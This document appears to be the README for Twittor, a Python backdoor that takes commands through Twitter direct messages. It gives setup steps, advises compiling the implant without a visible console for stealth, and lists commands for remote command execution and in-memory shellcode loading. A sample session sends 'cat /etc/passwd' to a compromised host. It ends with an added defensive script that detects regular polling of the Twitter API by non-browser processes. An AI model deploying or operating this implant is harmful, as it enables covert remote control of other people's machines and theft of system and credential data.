Twittor is a stealthy Python-based backdoor that uses Twitter (Direct Messages) as a command and control server. This project was inspired by Gcat, which does the same but using a Gmail account.
Setup
For this to work you need:
- A Twitter account (Use a dedicated account! Do not use your personal one!)
- An app registered on Twitter with the "Read, Write, and Direct Messages" access level.
Install the dependencies:
    $ pip install -r requirements.txt
This repo contains two files:
- twittor.py, which is the client
- implant.py, the actual backdoor to deploy
In both files, edit the access token part and add the ones that you previously generated:
1 2 3 4 5 6 7 |
CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX' USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX' |
You’re probably going to want to compile implant.py into an executable using PyInstaller. In order to remove the console when compiling with PyInstaller, the flags --noconsole --onefile will help. Just saying.
Usage
In order to run the client, launch the script.
    $ python twittor.py
You’ll then get an ‘interactive’ shell which offers a few commands:
    $ help

        refresh - refresh C&C control
        list_bots - list active bots
        list_commands - list executed commands
        !retrieve <jobid> - retrieve jobid command
        !cmd <MAC ADDRESS> command - execute the command on the bot
        !shellcode <MAC ADDRESS> shellcode - load and execute shellcode in memory (Windows only)
        help - print this usage
        exit - exit the client

    $
Once you’ve deployed the backdoor on a couple of systems, you can check available clients using the list_bots command:
    $ list_bots
    B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
    $
The output shows the MAC address, which uniquely identifies the system, along with information about the OS the implant is running on. In this case, a Linux box.
Let’s issue a command to an implant:
    $ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
    [+] Sent command "cat /etc/passwd" with jobid: UMW07r2
    $
Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd; the script then outputs the jobid that we can use to retrieve the output of that command.
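Seen from the defender's side, an implant that takes its commands from Twitter Direct Messages has to call the Twitter API from a process that is not a browser. The following is an added detection example, not code from Twittor or the original page; the log format, the browser allowlist, the thresholds and the assumption that the implant polls at a near-constant interval are all illustrative.

```python
import csv
import io
import statistics
from collections import defaultdict

# Constructed sample telemetry (not real data): epoch seconds, host,
# process image name, destination hostname. The format is an assumption.
SAMPLE_LOG = """ts,host,image,dest
1000,ws01,firefox.exe,api.twitter.com
1030,ws01,firefox.exe,api.twitter.com
1000,ws02,svchelper.exe,api.twitter.com
1060,ws02,svchelper.exe,api.twitter.com
1121,ws02,svchelper.exe,api.twitter.com
1180,ws02,svchelper.exe,api.twitter.com
1240,ws02,svchelper.exe,api.twitter.com
1000,ws03,python.exe,api.twitter.com
1010,ws03,python.exe,api.twitter.com
1400,ws03,python.exe,api.twitter.com
1450,ws03,python.exe,api.twitter.com
3000,ws03,python.exe,api.twitter.com
1000,ws04,backup.exe,api.twitter.com
1500,ws04,backup.exe,api.twitter.com
"""

TWITTER_API_HOSTS = {"api.twitter.com"}  # API endpoint rather than the web UI
BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe"}  # assumed allowlist


def find_suspects(log_text, min_hits=4, max_cv=0.2):
    """Return {(host, image): mean_gap_seconds} for non-browser processes
    that contact the Twitter API at near-constant intervals."""
    hits = defaultdict(list)
    for row in csv.DictReader(io.StringIO(log_text)):
        image = row["image"].lower()
        if row["dest"].lower() in TWITTER_API_HOSTS and image not in BROWSERS:
            hits[(row["host"], image)].append(float(row["ts"]))
    suspects = {}
    for key, times in hits.items():
        if len(times) < min_hits:
            continue  # too few connections to judge regularity
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        # Coefficient of variation: low values mean machine-like polling.
        cv = statistics.pstdev(gaps) / mean if mean else 0.0
        if cv <= max_cv:
            suspects[key] = round(mean, 1)
    return suspects
```

A process that passes the interval test but still has no business talking to the Twitter API (ws03 and ws04 in the sample) is worth a separate allowlist review, since polling with jitter would defeat the regularity check alone.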